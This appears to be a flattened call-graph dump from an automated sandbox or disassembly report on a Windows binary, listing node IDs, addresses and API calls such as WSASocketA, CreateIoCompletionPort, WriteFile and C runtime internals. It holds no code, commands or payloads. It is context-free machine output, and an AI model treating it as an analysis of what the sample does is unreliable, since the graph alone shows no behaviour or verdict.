Mailbox 68 API calls 20471->20472 20472->19858 20474 2d63548 __EH_prolog 20473->20474 20475 2d63576 20474->20475 20476 2d63557 20474->20476 20495 2d62edd WSASetLastError WSASocketA 20475->20495 20477 2d61996 68 API calls 20476->20477 20493 2d6355f 20477->20493 20480 2d635ad CreateIoCompletionPort 20481 2d635c5 GetLastError 20480->20481 20482 2d635db 20480->20482 20483 2d70a50 Mailbox 68 API calls 20481->20483 20484 2d70a50 Mailbox 68 API calls 20482->20484 20485 2d635d2 20483->20485 20484->20485 20486 2d63626 20485->20486 20487 2d635ef 20485->20487 20521 2d6de2a 20486->20521 20488 2d70a50 Mailbox 68 API calls 20487->20488 20489 2d63608 20488->20489 20503 2d629ee 20489->20503 20492 2d63659 20494 2d70a50 Mailbox 68 API calls 20492->20494 20493->19854 20494->20493 20496 2d70a50 Mailbox 68 API calls 20495->20496 20497 2d62f0a WSAGetLastError 20496->20497 20498 2d62f21 20497->20498 20502 2d62f41 20497->20502 20499 2d62f27 setsockopt 20498->20499 20500 2d62f3c 20498->20500 20499->20500 20501 2d70a50 Mailbox 68 API calls 20500->20501 20501->20502 20502->20480 20502->20493 20504 2d62a0c 20503->20504 20520 2d62aad 20503->20520 20505 2d62a39 WSASetLastError closesocket 20504->20505 20509 2d70a50 Mailbox 68 API calls 20504->20509 20507 2d6a440 69 API calls 20505->20507 20506 2d70a50 Mailbox 68 API calls 20508 2d62ab8 20506->20508 20510 2d62a51 20507->20510 20508->20493 20511 2d62a21 20509->20511 20512 2d70a50 Mailbox 68 API calls 20510->20512 20510->20520 20525 2d62f50 20511->20525 20514 2d62a5c 20512->20514 20516 2d62a7b ioctlsocket WSASetLastError closesocket 20514->20516 20517 2d70a50 Mailbox 68 API calls 20514->20517 20519 2d6a440 69 API calls 20516->20519 20518 2d62a6e 20517->20518 20518->20516 20518->20520 20519->20520 20520->20506 20520->20508 20522 2d6de34 __EH_prolog 20521->20522 20523 2d73a8f _Allocate 60 API calls 20522->20523 20524 2d6de48 20523->20524 20524->20492 20526 2d62f70 WSASetLastError setsockopt 20525->20526 20527 2d62f5b 20525->20527 20528 2d6a440 69 API calls 20526->20528 20529 2d70a50 Mailbox 68 API calls 20527->20529 20530 2d62f9e 20528->20530 20531 2d62a36 20529->20531 20530->20531 20532 2d70a50 Mailbox 68 API calls 20530->20532 20531->20505 20532->20531 20534 2d6304d WSASetLastError select 20533->20534 20535 2d6303b 20533->20535 20537 2d6a440 69 API calls 20534->20537 20536 2d70a50 Mailbox 68 API calls 20535->20536 20540 2d62b59 20536->20540 20538 2d63095 20537->20538 20539 2d70a50 Mailbox 68 API calls 20538->20539 20538->20540 20539->20540 20540->20472 20541 2d62fb4 20540->20541 20542 2d62fd5 WSASetLastError getsockopt 20541->20542 20543 2d62fc0 20541->20543 20544 2d6a440 69 API calls 20542->20544 20545 2d70a50 Mailbox 68 API calls 20543->20545 20546 2d6300f 20544->20546 20547 2d62b7a 20545->20547 20546->20547 20548 2d70a50 Mailbox 68 API calls 20546->20548 20547->20471 20547->20472 20548->20547 20556 2d85330 20549->20556 20551 2d632b5 RtlEnterCriticalSection 20552 2d70a50 Mailbox 68 API calls 20551->20552 20553 2d632d6 20552->20553 20557 2d63307 20553->20557 20556->20551 20559 2d63311 __EH_prolog 20557->20559 20560 2d63350 20559->20560 20569 2d67db9 20559->20569 20573 2d6239d 20560->20573 20563 2d63390 20579 2d67d62 20563->20579 20565 2d70a50 Mailbox 68 API calls 20566 2d6337c 20565->20566 20568 2d62d39 71 API calls 20566->20568 20568->20563 20572 2d67dc7 20569->20572 20570 2d67e3d 20570->20559 20572->20570 20583 2d6891e 20572->20583 20577 2d623ab 20573->20577 20574 2d62417 20574->20563 20574->20565 20575 2d623c1 PostQueuedCompletionStatus 20576 2d623da RtlEnterCriticalSection 20575->20576 20575->20577 20576->20577 20577->20574 20577->20575 20578 2d623f8 InterlockedExchange RtlLeaveCriticalSection 20577->20578 20578->20577 20581 2d67d67 20579->20581 20580 2d632ee RtlLeaveCriticalSection 20580->19874 20581->20580 20599 2d61e7f 20581->20599 20584 2d68948 20583->20584 20585 2d67d62 68 API calls 20584->20585 20587 2d6898e 20585->20587 20586 2d689b5 20586->20570 20587->20586 20589 2d6a1ab 20587->20589 20590 2d6a1b5 20589->20590 20591 2d6a1c5 20589->20591 20590->20591 20594 2d6fa69 20590->20594 20591->20586 20595 2d72413 std::exception::exception 59 API calls 20594->20595 20596 2d6fa81 20595->20596 20597 2d7449a __CxxThrowException@8 RaiseException 20596->20597 20598 2d6fa96 20597->20598 20600 2d70a50 Mailbox 68 API calls 20599->20600 20601 2d61e90 20600->20601 20601->20581 20603 2d721bb _LocaleUpdate::_LocaleUpdate 59 API calls 20602->20603 20604 2d722d7 20603->20604 20605 2d722e5 20604->20605 20611 2d722fc 20604->20611 20606 2d75d9b __cftof_l 59 API calls 20605->20606 20607 2d722ea 20606->20607 20608 2d74e35 __cftof_l 9 API calls 20607->20608 20609 2d722f5 ___ascii_stricmp 20608->20609 20609->19885 20610 2d758ba 66 API calls __tolower_l 20610->20611 20611->20609 20611->20610 20613 2d727cb 20612->20613 20614 2d75d9b __cftof_l 59 API calls 20613->20614 20617 2d727db _strlen 20613->20617 20615 2d727d0 20614->20615 20616 2d74e35 __cftof_l 9 API calls 20615->20616 20616->20617 20617->19891 20619 2d6df41 __EH_prolog 20618->20619 20620 2d73a8f _Allocate 60 API calls 20619->20620 20621 2d6df58 20620->20621 20621->19902 20623 2d6a649 GetProcessHeap HeapFree 20622->20623 20623->19909 20625 2d721bb _LocaleUpdate::_LocaleUpdate 59 API calls 20624->20625 20626 2d76005 20625->20626 20627 2d75d9b __cftof_l 59 API calls 20626->20627 20628 2d7600a 20627->20628 20629 2d76adb 20628->20629 20641 2d7602a __output_l __aulldvrm _strlen 20628->20641 20669 2d79d71 20628->20669 20630 2d75d9b __cftof_l 59 API calls 20629->20630 20632 2d76ae0 20630->20632 20634 2d74e35 __cftof_l 9 API calls 20632->20634 20633 2d76ab5 20635 2d7448b __cftof_l 6 API calls 20633->20635 20634->20633 20636 2d723b6 20635->20636 20636->19920 20648 2d75e41 20636->20648 20638 2d76b10 79 API calls __output_l 20638->20641 20639 2d76693 RtlDecodePointer 20639->20641 20640 2d72eb4 _free 59 API calls 20640->20641 20641->20629 20641->20633 20641->20638 20641->20639 20641->20640 20642 2d789f4 __malloc_crt 59 API calls 20641->20642 20643 2d766f6 RtlDecodePointer 20641->20643 20644 2d7671b RtlDecodePointer 20641->20644 20645 2d7fa24 61 API calls __cftof 20641->20645 20646 2d76b58 79 API calls _write_multi_char 20641->20646 20647 2d76b84 79 API calls _write_string 20641->20647 20676 2d7dc4e 20641->20676 20642->20641 20643->20641 20644->20641 20645->20641 20646->20641 20647->20641 20649 2d79d71 __fclose_nolock 59 API calls 20648->20649 20650 2d75e4f 20649->20650 20651 2d75e71 20650->20651 20652 2d75e5a 20650->20652 20653 2d75e76 20651->20653 20654 2d75e83 __flsbuf 20651->20654 20655 2d75d9b __cftof_l 59 API calls 20652->20655 20656 2d75d9b __cftof_l 59 API calls 20653->20656 20657 2d75e5f 20654->20657 20665 2d75ed2 20654->20665 20668 2d75edd 20654->20668 20679 2d7f6e2 20654->20679 20655->20657 20656->20657 20657->19920 20658 2d75ee7 20661 2d75f01 20658->20661 20664 2d75f18 20658->20664 20659 2d75f61 20660 2d79d95 __write 79 API calls 20659->20660 20660->20657 20691 2d79d95 20661->20691 20664->20657 20719 2d7f736 20664->20719 20665->20668 20688 2d7f8a5 20665->20688 20668->20658 20668->20659 20670 2d79d90 20669->20670 20671 2d79d7b 20669->20671 20670->20641 20672 2d75d9b __cftof_l 59 API calls 20671->20672 20673 2d79d80 20672->20673 20674 2d74e35 __cftof_l 9 API calls 20673->20674 20675 2d79d8b 20674->20675 20675->20641 20677 2d721bb _LocaleUpdate::_LocaleUpdate 59 API calls 20676->20677 20678 2d7dc5f 20677->20678 20678->20641 20680 2d7f6ed 20679->20680 20682 2d7f6fa 20679->20682 20681 2d75d9b __cftof_l 59 API calls 20680->20681 20683 2d7f6f2 20681->20683 20684 2d7f706 20682->20684 20685 2d75d9b __cftof_l 59 API calls 20682->20685 20683->20665 20684->20665 20686 2d7f727 20685->20686 20687 2d74e35 __cftof_l 9 API calls 20686->20687 20687->20683 20689 2d789f4 __malloc_crt 59 API calls 20688->20689 20690 2d7f8ba 20689->20690 20690->20668 20692 2d79da1 __getstream 20691->20692 20693 2d79dae 20692->20693 20696 2d79dc5 20692->20696 20694 2d75d67 __lseeki64 59 API calls 20693->20694 20697 2d79db3 20694->20697 20695 2d79e64 20699 2d75d67 __lseeki64 59 API calls 20695->20699 20696->20695 20698 2d79dd9 20696->20698 20700 2d75d9b __cftof_l 59 API calls 20697->20700 20701 2d79df7 20698->20701 20702 2d79e01 20698->20702 20703 2d79dfc 20699->20703 20713 2d79dba __getstream 20700->20713 20704 2d75d67 __lseeki64 59 API calls 20701->20704 20744 2d80bc7 20702->20744 20707 2d75d9b __cftof_l 59 API calls 20703->20707 20704->20703 20706 2d79e07 20708 2d79e2d 20706->20708 20709 2d79e1a 20706->20709 20710 2d79e70 20707->20710 20714 2d75d9b __cftof_l 59 API calls 20708->20714 20753 2d79e84 20709->20753 20712 2d74e35 __cftof_l 9 API calls 20710->20712 20712->20713 20713->20657 20716 2d79e32 20714->20716 20715 2d79e26 20812 2d79e5c 20715->20812 20717 2d75d67 __lseeki64 59 API calls 20716->20717 20717->20715 20720 2d7f742 __getstream 20719->20720 20721 2d7f753 20720->20721 20722 2d7f76b 20720->20722 20723 2d75d67 __lseeki64 59 API calls 20721->20723 20724 2d7f810 20722->20724 20728 2d7f7a0 20722->20728 20725 2d7f758 20723->20725 20726 2d75d67 __lseeki64 59 API calls 20724->20726 20727 2d75d9b __cftof_l 59 API calls 20725->20727 20729 2d7f815 20726->20729 20730 2d7f760 __getstream 20727->20730 20731 2d80bc7 ___lock_fhandle 60 API calls 20728->20731 20732 2d75d9b __cftof_l 59 API calls 20729->20732 20730->20657 20733 2d7f7a6 20731->20733 20734 2d7f81d 20732->20734 20735 2d7f7d4 20733->20735 20736 2d7f7bc 20733->20736 20737 2d74e35 __cftof_l 9 API calls 20734->20737 20738 2d75d9b __cftof_l 59 API calls 20735->20738 20739 2d7f832 __lseeki64_nolock 61 API calls 20736->20739 20737->20730 20740 2d7f7d9 20738->20740 20741 2d7f7cb 20739->20741 20742 2d75d67 __lseeki64 59 API calls 20740->20742 20845 2d7f808 20741->20845 20742->20741 20745 2d80bd3 __getstream 20744->20745 20746 2d80c22 RtlEnterCriticalSection 20745->20746 20748 2d7882d __lock 59 API calls 20745->20748 20747 2d80c48 __getstream 20746->20747 20747->20706 20749 2d80bf8 20748->20749 20750 2d80c10 20749->20750 20751 2d7914c __getstream InitializeCriticalSectionAndSpinCount 20749->20751 20815 2d80c4c 20750->20815 20751->20750 20754 2d79e91 __write_nolock 20753->20754 20755 2d79ed0 20754->20755 20756 2d79eef 20754->20756 20786 2d79ec5 20754->20786 20757 2d75d67 __lseeki64 59 API calls 20755->20757 20761 2d79f47 20756->20761 20762 2d79f2b 20756->20762 20760 2d79ed5 20757->20760 20758 2d7448b __cftof_l 6 API calls 20759 2d7a6e5 20758->20759 20759->20715 20763 2d75d9b __cftof_l 59 API calls 20760->20763 20764 2d79f60 20761->20764 20819 2d7f832 20761->20819 20765 2d75d67 __lseeki64 59 API calls 20762->20765 20766 2d79edc 20763->20766 20768 2d7f6e2 __write_nolock 59 API calls 20764->20768 20769 2d79f30 20765->20769 20770 2d74e35 __cftof_l 9 API calls 20766->20770 20771 2d79f6e 20768->20771 20772 2d75d9b __cftof_l 59 API calls 20769->20772 20770->20786 20773 2d7a2c7 20771->20773 20778 2d75b9a ___InternalCxxFrameHandler 59 API calls 20771->20778 20774 2d79f37 20772->20774 20776 2d7a2e5 20773->20776 20777 2d7a65a WriteFile 20773->20777 20775 2d74e35 __cftof_l 9 API calls 20774->20775 20775->20786 20779 2d7a409 20776->20779 20784 2d7a2fb 20776->20784 20780 2d7a2ba GetLastError 20777->20780 20788 2d7a287 20777->20788 20781 2d79f9a GetConsoleMode 20778->20781 20790 2d7a414 20779->20790 20799 2d7a4fe 20779->20799 20780->20788 20781->20773 20783 2d79fd9 20781->20783 20782 2d7a693 20782->20786 20787 2d75d9b __cftof_l 59 API calls 20782->20787 20783->20773 20789 2d79fe9 GetConsoleCP 20783->20789 20784->20782 20785 2d7a36a WriteFile 20784->20785 20784->20788 20785->20780 20785->20784 20786->20758 20788->20782 20788->20786 20792 2d7a3e7 20788->20792 20789->20782 20810 2d7a018 20789->20810 20790->20782 20790->20788 20794 2d7a479 WriteFile 20790->20794 20796 2d7a3f2 20792->20796 20797 2d7a68a 20792->20797 20793 2d7a573 WideCharToMultiByte 20793->20780 20793->20799 20794->20780 20794->20790 20799->20782 20799->20788 20799->20793 20801 2d7a5c2 WriteFile 20799->20801 20801->20799 20804 2d7a615 GetLastError 20801->20804 20804->20799 20810->20780 20810->20788 20844 2d80f6d RtlLeaveCriticalSection 20812->20844 20814 2d79e62 20814->20713 20818 2d78997 RtlLeaveCriticalSection 20815->20818 20817 2d80c53 20817->20746 20818->20817 20831 2d80e84 20819->20831 20821 2d7f842 20822 2d7f85b SetFilePointerEx 20821->20822 20823 2d7f84a 20821->20823 20825 2d7f873 GetLastError 20822->20825 20826 2d7f84f 20822->20826 20824 2d75d9b __cftof_l 59 API calls 20823->20824 20824->20826 20827 2d75d7a __dosmaperr 59 API calls 20825->20827 20826->20764 20827->20826 20832 2d80e8f 20831->20832 20833 2d80ea4 20831->20833 20834 2d75d67 __lseeki64 59 API calls 20832->20834 20835 2d75d67 __lseeki64 59 API calls 20833->20835 20837 2d80ec9 20833->20837 20836 2d80e94 20834->20836 20838 2d80ed3 20835->20838 20839 2d75d9b __cftof_l 59 API calls 20836->20839 20837->20821 20841 2d75d9b __cftof_l 59 API calls 20838->20841 20840 2d80e9c 20839->20840 20840->20821 20842 2d80edb 20841->20842 20843 2d74e35 __cftof_l 9 API calls 20842->20843 20843->20840 20844->20814 20848 2d80f6d RtlLeaveCriticalSection 20845->20848 20847 2d7f80e 20847->20730 20848->20847 20849->19924 20851 2d6e271 __EH_prolog 20850->20851 20852 2d73a8f _Allocate 60 API calls 20851->20852 20853 2d6e27a 20852->20853 20854 2d61bfa RtlEnterCriticalSection 20853->20854 20856 2d6e488 20853->20856 20854->19929 20857 2d6e492 __EH_prolog 20856->20857 20860 2d626db RtlEnterCriticalSection 20857->20860 20859 2d6e4e8 20859->20854 20861 2d62728 CreateWaitableTimerA 20860->20861 20865 2d6277e 20860->20865 20862 2d6275b SetWaitableTimer 20861->20862 20863 2d62738 GetLastError 20861->20863 20862->20865 20866 2d70a50 Mailbox 68 API calls 20863->20866 20864 2d627d5 RtlLeaveCriticalSection 20864->20859 20865->20864 20867 2d73a8f _Allocate 60 API calls 20865->20867 20868 2d62745 20866->20868 20869 2d6278a 20867->20869 20904 2d61712 20868->20904 20871 2d73a8f _Allocate 60 API calls 20869->20871 20875 2d627c8 20869->20875 20873 2d627a9 20871->20873 20876 2d61cf8 CreateEventA 20873->20876 20910 2d67d3a 20875->20910 20877 2d61d52 CreateEventA 20876->20877 20878 2d61d23 GetLastError 20876->20878 20879 2d61d96 20877->20879 20880 2d61d6b GetLastError 20877->20880 20882 2d61d33 20878->20882 20881 2d732fc __beginthreadex 201 API calls 20879->20881 20883 2d61d7b 20880->20883 20884 2d61db6 20881->20884 20885 2d70a50 Mailbox 68 API calls 20882->20885 20886 2d70a50 Mailbox 68 API calls 20883->20886 20887 2d61dc6 GetLastError 20884->20887 20888 2d61e0d 20884->20888 20889 2d61d3c 20885->20889 20890 2d61d84 20886->20890 20896 2d61dd8 20887->20896 20891 2d61e11 WaitForSingleObject CloseHandle 20888->20891 20892 2d61e1d 20888->20892 20893 2d61712 60 API calls 20889->20893 20895 2d61712 60 API calls 20890->20895 20891->20892 20892->20875 20894 2d61d4e 20893->20894 20894->20877 20895->20879 20897 2d61ddf 20896->20897 20898 2d61ddc CloseHandle 20896->20898 20899 2d61dee 20897->20899 20900 2d61de9 CloseHandle 20897->20900 20898->20897 20901 2d70a50 Mailbox 68 API calls 20899->20901 20900->20899 20902 2d61dfb 20901->20902 20903 2d61712 60 API calls 20902->20903 20903->20888 20905 2d6171c __EH_prolog 20904->20905 20906 2d6173e 20905->20906 20907 2d61815 Mailbox 59 API calls 20905->20907 20906->20862 20908 2d61732 20907->20908 20913 2d6a3d9 20908->20913 20911 2d67d56 20910->20911 20912 2d67d47 CloseHandle 20910->20912 20911->20864 20912->20911 20914 2d6a3e3 __EH_prolog 20913->20914 20921 2d6c93e 20914->20921 20918 2d6a404 20919 2d7449a __CxxThrowException@8 RaiseException 20918->20919 20920 2d6a412 20919->20920 20922 2d6b165 std::bad_exception::bad_exception 60 API calls 20921->20922 20923 2d6a3f6 20922->20923 20924 2d6c97a 20923->20924 20925 2d6c984 __EH_prolog 20924->20925 20928 2d6b114 20925->20928 20927 2d6c9b3 Mailbox 20927->20918 20929 2d6b11e __EH_prolog 20928->20929 20930 2d6b165 std::bad_exception::bad_exception 60 API calls 20929->20930 20931 2d6b12f Mailbox 20930->20931 20931->20927 20943 2d630ae WSASetLastError 20932->20943 20935 2d630ae 71 API calls 20936 2d63c90 20935->20936 20937 2d616ae 20936->20937 20938 2d616b8 __EH_prolog 20937->20938 20939 2d61701 20938->20939 20940 2d72413 std::exception::exception 59 API calls 20938->20940 20939->19806 20941 2d616dc 20940->20941 20942 2d6a3d9 60 API calls 20941->20942 20942->20939 20944 2d630ce 20943->20944 20945 2d630ec WSAStringToAddressA 20943->20945 20944->20945 20947 2d630d3 20944->20947 20946 2d6a440 69 API calls 20945->20946 20948 2d63114 20946->20948 20949 2d70a50 Mailbox 68 API calls 20947->20949 20950 2d63154 20948->20950 20956 2d6311e _memcmp 20948->20956 20958 2d630d8 20949->20958 20951 2d63135 20950->20951 20953 2d70a50 Mailbox 68 API calls 20950->20953 20952 2d63193 20951->20952 20954 2d70a50 Mailbox 68 API calls 20951->20954 20957 2d70a50 Mailbox 68 API calls 20952->20957 20952->20958 20953->20951 20954->20952 20955 2d70a50 Mailbox 68 API calls 20955->20951 20956->20951 20956->20955 20957->20958 20958->20935 20958->20936 20960 2d63bdd __EH_prolog 20959->20960 20961 2d63bfe htonl htonl 20960->20961 20971 2d723f7 20960->20971 20961->19944 20966 2d63c20 __EH_prolog 20965->20966 20967 2d63c41 20966->20967 20968 2d723f7 std::bad_exception::bad_exception 59 API calls 20966->20968 20967->19944 20969 2d63c35 20968->20969 20970 2d6a58e 60 API calls 20969->20970 20970->20967 20972 2d72413 std::exception::exception 59 API calls 20971->20972 20973 2d63bf2 20972->20973 20974 2d6a58e 20973->20974 20975 2d6a598 __EH_prolog 20974->20975 20982 2d6cab1 20975->20982 20979 2d6a5b3 20980 2d7449a __CxxThrowException@8 RaiseException 20979->20980 20981 2d6a5c1 20980->20981 20989 2d723dc 20982->20989 20985 2d6caed 20986 2d6caf7 __EH_prolog 20985->20986 20992 2d6b483 20986->20992 20988 2d6cb26 Mailbox 20988->20979 20990 2d72453 std::exception::exception 59 API calls 20989->20990 20991 2d6a5a5 20990->20991 20991->20985 20993 2d6b48d __EH_prolog 20992->20993 20994 2d723dc std::bad_exception::bad_exception 59 API calls 20993->20994 20995 2d6b49e Mailbox 20994->20995 20995->20988 20997 2d63755 InterlockedCompareExchange 20996->20997 20998 2d63770 20996->20998 20997->20998 20999 2d63765 20997->20999 21000 2d70a50 Mailbox 68 API calls 20998->21000 21001 2d632ab 78 API calls 20999->21001 21002 2d63779 21000->21002 21001->20998 21003 2d629ee 76 API calls 21002->21003 21004 2d6378e 21003->21004 21004->19948 21034 2d735f0 21005->21034 21007 2d653c8 21007->19958 21008 2d73849 21007->21008 21009 2d73855 __getstream 21008->21009 21010 2d73873 21009->21010 21011 2d7388b 21009->21011 21012 2d73883 __getstream 21009->21012 21014 2d75d9b __cftof_l 59 API calls 21010->21014 21176 2d79732 21011->21176 21012->19960 21016 2d73878 21014->21016 21018 2d74e35 __cftof_l 9 API calls 21016->21018 21018->21012 21022 2d739d3 __getstream 21021->21022 21023 2d739e7 21022->21023 21024 2d739ff 21022->21024 21025 2d75d9b __cftof_l 59 API calls 21023->21025 21027 2d79732 __lock_file 60 API calls 21024->21027 21031 2d739f7 __getstream 21024->21031 21026 2d739ec 21025->21026 21029 2d74e35 __cftof_l 9 API calls 21026->21029 21028 2d73a11 21027->21028 21203 2d7395b 21028->21203 21029->21031 21031->19958 21037 2d735fc __getstream 21034->21037 21035 2d7360e 21036 2d75d9b __cftof_l 59 API calls 21035->21036 21038 2d73613 21036->21038 21037->21035 21039 2d7363b 21037->21039 21041 2d74e35 __cftof_l 9 API calls 21038->21041 21053 2d79808 21039->21053 21050 2d7361e @_EH4_CallFilterFunc@8 __getstream 21041->21050 21042 2d73640 21043 2d73656 21042->21043 21044 2d73649 21042->21044 21046 2d7367f 21043->21046 21047 2d7365f 21043->21047 21045 2d75d9b __cftof_l 59 API calls 21044->21045 21045->21050 21068 2d79927 21046->21068 21048 2d75d9b __cftof_l 59 API calls 21047->21048 21048->21050 21050->21007 21054 2d79814 __getstream 21053->21054 21055 2d7882d __lock 59 API calls 21054->21055 21056 2d79822 21055->21056 21057 2d7989d 21056->21057 21063 2d788b5 __mtinitlocknum 59 API calls 21056->21063 21066 2d79896 21056->21066 21088 2d79771 21056->21088 21093 2d797db 21056->21093 21058 2d789f4 __malloc_crt 59 API calls 21057->21058 21060 2d798a4 21058->21060 21062 2d7914c __getstream InitializeCriticalSectionAndSpinCount 21060->21062 21060->21066 21061 2d79913 __getstream 21061->21042 21065 2d798ca RtlEnterCriticalSection 21062->21065 21063->21056 21065->21066 21098 2d7991e 21066->21098 21077 2d79944 21068->21077 21069 2d79958 21070 2d75d9b __cftof_l 59 API calls 21069->21070 21072 2d7995d 21070->21072 21071 2d79aff 21071->21069 21074 2d79b5b 21071->21074 21073 2d74e35 __cftof_l 9 API calls 21072->21073 21076 2d7368a 21073->21076 21109 2d80770 21074->21109 21085 2d736ac 21076->21085 21077->21069 21077->21071 21103 2d8078e 21077->21103 21082 2d808bd __openfile 59 API calls 21083 2d79b17 21082->21083 21083->21071 21084 2d808bd __openfile 59 API calls 21083->21084 21084->21071 21169 2d797a1 21085->21169 21087 2d736b2 21087->21050 21089 2d79792 RtlEnterCriticalSection 21088->21089 21090 2d7977c 21088->21090 21089->21056 21091 2d7882d __lock 59 API calls 21090->21091 21092 2d79785 21091->21092 21092->21056 21094 2d797fc RtlLeaveCriticalSection 21093->21094 21095 2d797e9 21093->21095 21094->21056 21101 2d78997 RtlLeaveCriticalSection 21095->21101 21097 2d797f9 21097->21056 21102 2d78997 RtlLeaveCriticalSection 21098->21102 21100 2d79925 21100->21061 21101->21097 21102->21100 21112 2d807a6 21103->21112 21105 2d79ac5 21105->21069 21106 2d808bd 21105->21106 21120 2d808d5 21106->21120 21108 2d79af8 21108->21071 21108->21082 21127 2d80659 21109->21127 21111 2d80789 21111->21076 21113 2d807bb 21112->21113 21116 2d807b4 21112->21116 21114 2d721bb _LocaleUpdate::_LocaleUpdate 59 API calls 21113->21114 21115 2d807c8 21114->21115 21115->21116 21117 2d75d9b __cftof_l 59 API calls 21115->21117 21116->21105 21118 2d807fb 21117->21118 21119 2d74e35 __cftof_l 9 API calls 21118->21119 21119->21116 21121 2d721bb _LocaleUpdate::_LocaleUpdate 59 API calls 21120->21121 21122 2d808e8 21121->21122 21123 2d75d9b __cftof_l 59 API calls 21122->21123 21126 2d808fd 21122->21126 21124 2d80929 21123->21124 21125 2d74e35 __cftof_l 9 API calls 21124->21125 21125->21126 21126->21108 21128 2d80665 __getstream 21127->21128 21129 2d8067b 21128->21129 21131 2d806b1 21128->21131 21130 2d75d9b __cftof_l 59 API calls 21129->21130 21132 2d80680 21130->21132 21138 2d80722 21131->21138 21134 2d74e35 __cftof_l 9 API calls 21132->21134 21137 2d8068a __getstream 21134->21137 21137->21111 21147 2d78176 21138->21147 21140 2d80736 21141 2d72eb4 _free 59 API calls 21140->21141 21142 2d806cd 21140->21142 21141->21142 21143 2d806f6 21142->21143 21144 2d806fc 21143->21144 21145 2d80720 21143->21145 21168 2d80f6d RtlLeaveCriticalSection 21144->21168 21145->21137 21148 2d78183 21147->21148 21149 2d78199 21147->21149 21150 2d75d9b __cftof_l 59 API calls 21148->21150 21149->21148 21153 2d781a0 ___crtIsPackagedApp 21149->21153 21151 2d78188 21150->21151 21152 2d74e35 __cftof_l 9 API calls 21151->21152 21162 2d78192 21152->21162 21154 2d781b6 MultiByteToWideChar 21153->21154 21155 2d781a9 AreFileApisANSI 21153->21155 21157 2d781e1 21154->21157 21158 2d781d0 GetLastError 21154->21158 21155->21154 21156 2d781b3 21155->21156 21156->21154 21159 2d789f4 __malloc_crt 59 API calls 21157->21159 21160 2d75d7a __dosmaperr 59 API calls 21158->21160 21161 2d781e9 21159->21161 21160->21162 21161->21162 21163 2d781f0 MultiByteToWideChar 21161->21163 21162->21140 21163->21162 21164 2d78206 GetLastError 21163->21164 21165 2d75d7a __dosmaperr 59 API calls 21164->21165 21166 2d78212 21165->21166 21167 2d72eb4 _free 59 API calls 21166->21167 21167->21162 21168->21145 21170 2d797b0 21169->21170 21171 2d797cf RtlLeaveCriticalSection 21169->21171 21170->21171 21172 2d797b7 21170->21172 21171->21087 21175 2d78997 RtlLeaveCriticalSection 21172->21175 21174 2d797cc 21174->21087 21175->21174 21177 2d79764 RtlEnterCriticalSection 21176->21177 21178 2d79742 21176->21178 21180 2d73891 21177->21180 21178->21177 21179 2d7974a 21178->21179 21181 2d7882d __lock 59 API calls 21179->21181 21182 2d736f0 21180->21182 21181->21180 21185 2d736ff 21182->21185 21191 2d7371d 21182->21191 21183 2d7370d 21184 2d75d9b __cftof_l 59 API calls 21183->21184 21186 2d73712 21184->21186 21185->21183 21187 2d73737 _memmove 21185->21187 21185->21191 21188 2d74e35 __cftof_l 9 API calls 21186->21188 21189 2d75e41 __flsbuf 79 API calls 21187->21189 21187->21191 21192 2d79d71 __fclose_nolock 59 API calls 21187->21192 21193 2d79d95 __write 79 API calls 21187->21193 21197 2d7a72f 21187->21197 21188->21191 21189->21187 21194 2d738c3 21191->21194 21192->21187 21193->21187 21195 2d797a1 __fsopen 2 API calls 21194->21195 21196 2d738c9 21195->21196 21196->21012 21198 2d7a766 21197->21198 21199 2d7a742 21197->21199 21198->21187 21199->21198 21200 2d79d71 __fclose_nolock 59 API calls 21199->21200 21201 2d7a75f 21200->21201 21202 2d79d95 __write 79 API calls 21201->21202 21202->21198 21204 2d7397e 21203->21204 21205 2d7396a 21203->21205 21208 2d7a72f __flush 79 API calls 21204->21208 21217 2d7397a 21204->21217 21206 2d75d9b __cftof_l 59 API calls 21205->21206 21207 2d7396f 21206->21207 21210 2d74e35 __cftof_l 9 API calls 21207->21210 21209 2d7398a 21208->21209 21222 2d7b1db 21209->21222 21210->21217 21213 2d79d71 __fclose_nolock 59 API calls 21214 2d73998 21213->21214 21226 2d7b066 21214->21226 21216 2d7399e 21216->21217 21218 2d72eb4 _free 59 API calls 21216->21218 21219 2d73a36 21217->21219 21218->21217 21220 2d797a1 __fsopen 2 API calls 21219->21220 21221 2d73a3c 21220->21221 21221->21031 21223 2d73992 21222->21223 21224 2d7b1e8 21222->21224 21223->21213 21224->21223 21225 2d72eb4 _free 59 API calls 21224->21225 21225->21223 21227 2d7b072 __getstream 21226->21227 21228 2d7b096 21227->21228 21229 2d7b07f 21227->21229 21231 2d7b121 21228->21231 21233 2d7b0a6 21228->21233 21230 2d75d67 __lseeki64 59 API calls 21229->21230 21232 2d7b084 21230->21232 21234 2d75d67 __lseeki64 59 API calls 21231->21234 21235 2d75d9b __cftof_l 59 API calls 21232->21235 21236 2d7b0c4 21233->21236 21237 2d7b0ce 21233->21237 21238 2d7b0c9 21234->21238 21248 2d7b08b __getstream 21235->21248 21239 2d75d67 __lseeki64 59 API calls 21236->21239 21240 2d80bc7 ___lock_fhandle 60 API calls 21237->21240 21242 2d75d9b __cftof_l 59 API calls 21238->21242 21239->21238 21241 2d7b0d4 21240->21241 21243 2d7b0e7 21241->21243 21244 2d7b0f2 21241->21244 21245 2d7b12d 21242->21245 21252 2d7b141 21243->21252 21249 2d75d9b __cftof_l 59 API calls 21244->21249 21246 2d74e35 __cftof_l 9 API calls 21245->21246 21246->21248 21248->21216 21250 2d7b0ed 21249->21250 21267 2d7b119 21250->21267 21253 2d80e84 __chsize_nolock 59 API calls 21252->21253 21256 2d7b14f 21253->21256 21254 2d7b1a5 21270 2d80dfe 21254->21270 21256->21254 21258 2d80e84 __chsize_nolock 59 API calls 21256->21258 21266 2d7b183 21256->21266 21257 2d80e84 __chsize_nolock 59 API calls 21259 2d7b18f CloseHandle 21257->21259 21262 2d7b17a 21258->21262 21259->21254 21266->21254 21266->21257 21279 2d80f6d RtlLeaveCriticalSection 21267->21279 21269 2d7b11f 21269->21248 21279->21269 21280 40b1fe RegCloseKey

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
